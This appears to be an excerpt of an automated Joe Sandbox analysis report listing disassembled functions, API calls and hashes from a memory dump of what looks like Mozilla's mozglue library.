                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: 68aedf7ea9e5876b4fbcd232abcc829b4b1a6f08d165cdba455353da6730de6a
                                                                  • Instruction ID: 5044e9f5304da9f38b4eec709375bf7d4e3acb0f95b9bc0dbe5776e7fbab6628
                                                                  • Opcode Fuzzy Hash: 68aedf7ea9e5876b4fbcd232abcc829b4b1a6f08d165cdba455353da6730de6a
                                                                  • Instruction Fuzzy Hash: C4D17BB1A002099FDB14CF69CA80BAEBBF6FF88314F584529E955A7740D731ED16CB90
                                                                  APIs
                                                                    • Part of subcall function 6C0531C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C053217
                                                                    • Part of subcall function 6C0531C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C053236
                                                                    • Part of subcall function 6C0531C0: FreeLibrary.KERNEL32 ref: 6C05324B
                                                                    • Part of subcall function 6C0531C0: __Init_thread_footer.LIBCMT ref: 6C053260
                                                                    • Part of subcall function 6C0531C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C05327F
                                                                    • Part of subcall function 6C0531C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C05328E
                                                                    • Part of subcall function 6C0531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0532AB
                                                                    • Part of subcall function 6C0531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0532D1
                                                                    • Part of subcall function 6C0531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0532E5
                                                                    • Part of subcall function 6C0531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0532F7
                                                                  • QueryUnbiasedInterruptTime.KERNEL32 ref: 6C053127
                                                                  • __aulldiv.LIBCMT ref: 6C053140
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Time$StampV01@@Value@mozilla@@$LibraryStamp@mozilla@@$AddressCreation@FreeInit_thread_footerInterruptLoadNow@ProcProcessQueryUnbiasedV12@V12@___aulldiv
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3886099572-2178588373
                                                                  • Opcode ID: 91c23db22d9a133eb3d9a83e1bc692cd74cdff3ea824adcd01a245643a3e3fb5
                                                                  • Instruction ID: 3f1dcb86a63c49cf1b7f4f30660f65d84c4bc13575b5e39131929942dbd8c1c1
                                                                  • Opcode Fuzzy Hash: 91c23db22d9a133eb3d9a83e1bc692cd74cdff3ea824adcd01a245643a3e3fb5
                                                                  • Instruction Fuzzy Hash: 2C11E171B092018FDB08DF38D8017AABBF9AF8A600F54C52DF9A487A90DF307514CB92
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000080,?,?,?,?,?,?,?,?,?,?,?,?,6C0B041E,?,6C0B03C0), ref: 6C0B04D8
                                                                  • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0B041E), ref: 6C0B04E3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionInitializeVariablemoz_xmalloc
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1952960883-2178588373
                                                                  • Opcode ID: b950c6e982703792e833efdc5747ef18c9ecd6490d2c6ceec415088ea680988b
                                                                  • Instruction ID: 4f350962f43ecf36c25beed7c448429ba78c28939827a19421deccaf52bee3e6
                                                                  • Opcode Fuzzy Hash: b950c6e982703792e833efdc5747ef18c9ecd6490d2c6ceec415088ea680988b
                                                                  • Instruction Fuzzy Hash: D221D4B0D087848AE740CF3D89813A5B7F4BF99218F049669DD9896223FB71A5D8C781
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6C08B57E
                                                                  • ___raise_securityfailure.LIBCMT ref: 6C08B665
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3761405300-2178588373
                                                                  • Opcode ID: 9638ea4a795a2afff9ae09d8da4ea110c59cbb6801b3e25a9230a1918b0c97d6
                                                                  • Instruction ID: 680358598172ef85f28a8f2b5c356f1aabe2a9aef721e1dc5da07805288b49fa
                                                                  • Opcode Fuzzy Hash: 9638ea4a795a2afff9ae09d8da4ea110c59cbb6801b3e25a9230a1918b0c97d6
                                                                  • Instruction Fuzzy Hash: 9221F3B47052009AEF10CF19D995754BBF4BB4A715F20842AFD288B390EBB0B584CF95
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?,6C06419B), ref: 6C06442B
                                                                  • __Init_thread_footer.LIBCMT ref: 6C06445E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentInit_thread_footerProcess
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2722969572-2178588373
                                                                  • Opcode ID: 9cc28c04085ff83988b6fd4a0e57508f9b43f15179caf87df716f820fca89aa5
                                                                  • Instruction ID: 74527d1d18f9b1756ae55e84e54104c6011a899bf175d8e92c1c395784a547eb
                                                                  • Opcode Fuzzy Hash: 9cc28c04085ff83988b6fd4a0e57508f9b43f15179caf87df716f820fca89aa5
                                                                  • Instruction Fuzzy Hash: 4B11E030B042489BDB00CFE99865BFE77F8EB47614B118028DD158BB80DF20BA09CBA1
                                                                  APIs
                                                                  • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C0C98DE
                                                                    • Part of subcall function 6C0C9830: ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C0C985D
                                                                    • Part of subcall function 6C0C9830: ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C0C987D
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                    • Part of subcall function 6C084AA0: memset.VCRUNTIME140(?,00000000,00004014), ref: 6C084ACE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Printf$ProcessTarget@mozilla@@$?vprint@CrashCurrentTerminatememset
                                                                  • String ID: ElementAt(aIndex = %zu, aLength = %zu)$3JT/
                                                                  • API String ID: 811957328-3705640670
                                                                  • Opcode ID: 476b8431468871df0701e510b60401eca210284f31b92577fb5b60e4905f11eb
                                                                  • Instruction ID: 6a33c370835507b47f44327af88159a4d994f6c052d23c9c5029e4c0d2d4a253
                                                                  • Opcode Fuzzy Hash: 476b8431468871df0701e510b60401eca210284f31b92577fb5b60e4905f11eb
                                                                  • Instruction Fuzzy Hash: CEF08176A001087BDF109F99EC54AEE77A9DB88664F408014FE196B740DA71BA14CBE1
                                                                  APIs
                                                                  • ?GetAccessibilityResource@ActCtxResource@mscom@mozilla@@SA?AU123@XZ.MOZGLUE(?,6C08D9F0,00000000), ref: 6C08F13D
                                                                  • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE(?,6C08D9F0,00000000), ref: 6C08F198
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: AccessibilityDown@mozilla@@LockedResource@Resource@mscom@mozilla@@U123@Win32k
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1929277433-2178588373
                                                                  • Opcode ID: fb1ef5fd56133da3fe9ef824d6468c16ff0155191e787f79c5cd68777624a5cd
                                                                  • Instruction ID: 6147ebd4d2f0038199d517902c9eccf7ea3d25d42ad4a97c473a4b36293580ae
                                                                  • Opcode Fuzzy Hash: fb1ef5fd56133da3fe9ef824d6468c16ff0155191e787f79c5cd68777624a5cd
                                                                  • Instruction Fuzzy Hash: AF11E9716053158BDF108F39D84075BB7F9AFC5B58F00853DD88A9BB40DB30E40887A1
                                                                  APIs
                                                                  • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C0B789F
                                                                  • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C0B78CF
                                                                    • Part of subcall function 6C054DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C054E5A
                                                                    • Part of subcall function 6C054DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C054E97
                                                                    • Part of subcall function 6C054290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C093EBD,6C093EBD,00000000), ref: 6C0542A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@strlen
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1846559125-2178588373
                                                                  • Opcode ID: 22bd1ed1619f19e6ae2ca856162484027f4e4b4396cb4941acf27bf06ee2c4ff
                                                                  • Instruction ID: 6681a255e93fa5fbc54a7d4733f92ef1459a6e54acdc10f5b92ac98db3b8b7e1
                                                                  • Opcode Fuzzy Hash: 22bd1ed1619f19e6ae2ca856162484027f4e4b4396cb4941acf27bf06ee2c4ff
                                                                  • Instruction Fuzzy Hash: 051190B16047029FC310DF29C48065AFBF4FF89354F504A2DE4A987B80DB30A568CBD2
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6C0A759E,?,?), ref: 6C0A1CB4
                                                                  • free.MOZGLUE(?,?,?,?,?,?,6C0A759E,?,?,?,?,?,?,?,?,?), ref: 6C0A1CE9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Now@Stamp@mozilla@@TimeV12@_free
                                                                  • String ID: 3JT/
                                                                  • API String ID: 876075630-2178588373
                                                                  • Opcode ID: 250f3cc6e3e2e14547f931ad8fd5cbabf3968153ee7a48b91318b7f64e76f210
                                                                  • Instruction ID: 06b8fea59d82f0b1894ec98ca6338a84a42d9163f7a60031d775065f55364d3d
                                                                  • Opcode Fuzzy Hash: 250f3cc6e3e2e14547f931ad8fd5cbabf3968153ee7a48b91318b7f64e76f210
                                                                  • Instruction Fuzzy Hash: D211BF31900B059BC320CF69C8407A6B7F0BF8A718F40461DD99997A41EB31F499CB91
                                                                  APIs
                                                                    • Part of subcall function 6C08FA80: GetCurrentThreadId.KERNEL32 ref: 6C08FA8D
                                                                    • Part of subcall function 6C08FA80: AcquireSRWLockExclusive.KERNEL32(6C0DF448), ref: 6C08FA99
                                                                    • Part of subcall function 6C0A1700: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,6C0A16CD), ref: 6C0A17DC
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,6C094F39,?,?,?,?,6C0955F5,?), ref: 6C0A16E6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_
                                                                  • String ID: 9Ol$3JT/
                                                                  • API String ID: 1463952509-2418889646
                                                                  • Opcode ID: 50d20489d44e0674dfdfb4106c0a982eecc1b8236da70394930b1181887e207e
                                                                  • Instruction ID: 3528c4818f5275643c81d9503410c00989d2a4d1f3ec6f9253d7f2de42d3ad7f
                                                                  • Opcode Fuzzy Hash: 50d20489d44e0674dfdfb4106c0a982eecc1b8236da70394930b1181887e207e
                                                                  • Instruction Fuzzy Hash: 8D1112B5A002099FCB00CFA9D884ADEBBF9EF49254F55802AD855E7351D730E948CBA0
                                                                  APIs
                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C0A0E16
                                                                    • Part of subcall function 6C08FA80: GetCurrentThreadId.KERNEL32 ref: 6C08FA8D
                                                                    • Part of subcall function 6C08FA80: AcquireSRWLockExclusive.KERNEL32(6C0DF448), ref: 6C08FA99
                                                                  • ReleaseSRWLockExclusive.KERNEL32 ref: 6C0A0E45
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$?profiler_get_core_buffer@baseprofiler@mozilla@@AcquireBuffer@2@ChunkedCurrentProfileReleaseThread
                                                                  • String ID: 3JT/
                                                                  • API String ID: 488134835-2178588373
                                                                  • Opcode ID: 8c038ea43e85054525fa382cdbd09e3fa068d2726ae2ba8d7d30b6a495d56fcb
                                                                  • Instruction ID: 82498c7b0f751225d9d04e0fbe7a53bc263bc4c3471b675205f734054c243c93
                                                                  • Opcode Fuzzy Hash: 8c038ea43e85054525fa382cdbd09e3fa068d2726ae2ba8d7d30b6a495d56fcb
                                                                  • Instruction Fuzzy Hash: B0114CB16083498FCB00DF68D44139FBBF4EF8A218F55882DE89997701D730E844CBA2
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0644B2,6C0DE21C,6C0DF7F8), ref: 6C06473E
                                                                  • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C06474A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetNtLoaderAPI
                                                                  • API String ID: 1646373207-1628273567
                                                                  • Opcode ID: 5dade800061f572e118a9c968458d08b1d06ead2328c1fa7d90e7619d3a95081
                                                                  • Instruction ID: 21d3072054cd673ee3bb6c3764287fba5e2824141faa902c8e52d47b341f3ba2
                                                                  • Opcode Fuzzy Hash: 5dade800061f572e118a9c968458d08b1d06ead2328c1fa7d90e7619d3a95081
                                                                  • Instruction Fuzzy Hash: 32015E757053149FDF00AFA68894729BBF9EB8B725B054469EE05C7700DF74E9018F92
                                                                  APIs
                                                                  • MozDescribeCodeAddress.MOZGLUE ref: 6C0B6FAA
                                                                    • Part of subcall function 6C0B6A10: InitializeCriticalSection.KERNEL32(6C0DF618), ref: 6C0B6A68
                                                                    • Part of subcall function 6C0B6A10: GetCurrentProcess.KERNEL32 ref: 6C0B6A7D
                                                                    • Part of subcall function 6C0B6A10: GetCurrentProcess.KERNEL32 ref: 6C0B6AA1
                                                                    • Part of subcall function 6C0B6A10: EnterCriticalSection.KERNEL32(6C0DF618), ref: 6C0B6AAE
                                                                    • Part of subcall function 6C0B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C0B6AE1
                                                                    • Part of subcall function 6C0B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C0B6B15
                                                                    • Part of subcall function 6C0B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C0B6B65
                                                                    • Part of subcall function 6C0B6A10: LeaveCriticalSection.KERNEL32(6C0DF618,?,?), ref: 6C0B6B83
                                                                  • MozFormatCodeAddress.MOZGLUE ref: 6C0B6FF0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1067246555-2178588373
                                                                  • Opcode ID: 3c615cd8d7fb2d4cfc44cefa8ed136f35ebdbe8d8a0c62c7848804a59cf33f88
                                                                  • Instruction ID: 3af135c27ce190bc199c95e15d536e23af61ab754024cc00dd30e72b1936b9d8
                                                                  • Opcode Fuzzy Hash: 3c615cd8d7fb2d4cfc44cefa8ed136f35ebdbe8d8a0c62c7848804a59cf33f88
                                                                  • Instruction Fuzzy Hash: 3A11FB759083098BCB08DF59D4846AEBBF4FF88704F00886EE85997350DB346A49CF92
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: InterruptQueryTimeUnbiased__aulldiv
                                                                  • String ID: 3JT/
                                                                  • API String ID: 218403179-2178588373
                                                                  • Opcode ID: b0921c6858de3d625ce3c1a5647876409209e1ccededbac19f44617886b67804
                                                                  • Instruction ID: ebf47930a38bbb8994a5adfe1bf0cea8dc0aeaae6e33e4eb9e27178f3c4126db
                                                                  • Opcode Fuzzy Hash: b0921c6858de3d625ce3c1a5647876409209e1ccededbac19f44617886b67804
                                                                  • Instruction Fuzzy Hash: 7101D271A04305ABDB109F39C945746BBF8EF46714F20CA19FAA883AA1DB70B494C781
                                                                  APIs
                                                                  • ?profiler_capture_backtrace@baseprofiler@mozilla@@YA?AV?$UniquePtr@VProfileChunkedBuffer@mozilla@@V?$DefaultDelete@VProfileChunkedBuffer@mozilla@@@2@@2@XZ.MOZGLUE(?), ref: 6C0A0BFA
                                                                  • moz_xmalloc.MOZGLUE(00000028), ref: 6C0A0C24
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ChunkedProfile$?profiler_capture_backtrace@baseprofiler@mozilla@@Buffer@mozilla@@Buffer@mozilla@@@2@@2@DefaultDelete@Ptr@Uniquemoz_xmalloc
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1190572063-2178588373
                                                                  • Opcode ID: b29084645e031a34c8137ee230685d15c35432634468a858ffb184c786e4a971
                                                                  • Instruction ID: 0b720ccf028dba4c9f619cf6738f3345fa40b38f02db16213d9a2a61a634a3af
                                                                  • Opcode Fuzzy Hash: b29084645e031a34c8137ee230685d15c35432634468a858ffb184c786e4a971
                                                                  • Instruction Fuzzy Hash: B701A2B1E002099BDB009F98E8427AFFBF4FF84658F104529D9465B741EB30A958C7D1
                                                                  APIs
                                                                  • ?toString@Decimal@blink@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.MOZGLUE(?), ref: 6C0BA2BA
                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?), ref: 6C0BA2E2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: D@2@@std@@D@std@@Decimal@blink@@String@U?$char_traits@V?$allocator@V?$basic_string@memcpy
                                                                  • String ID: 3JT/
                                                                  • API String ID: 919886186-2178588373
